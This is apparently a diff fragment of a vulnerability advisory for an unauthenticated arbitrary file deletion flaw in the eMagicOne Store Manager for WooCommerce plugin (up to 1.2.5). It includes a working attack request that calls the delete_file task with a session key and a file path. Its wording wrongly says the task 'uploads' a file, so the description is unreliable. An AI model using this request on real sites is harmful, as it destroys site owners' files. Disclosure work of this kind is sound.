eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Delete

 Arbitrary File Deletion

-With a valid session key, an attacker can upload a file using the delete_file
+With a valid session key, an attacker can upload a file using the delete_file task:

 POST /?connector=bridge&task=delete_file&key=<session_key>&path=wp-content.php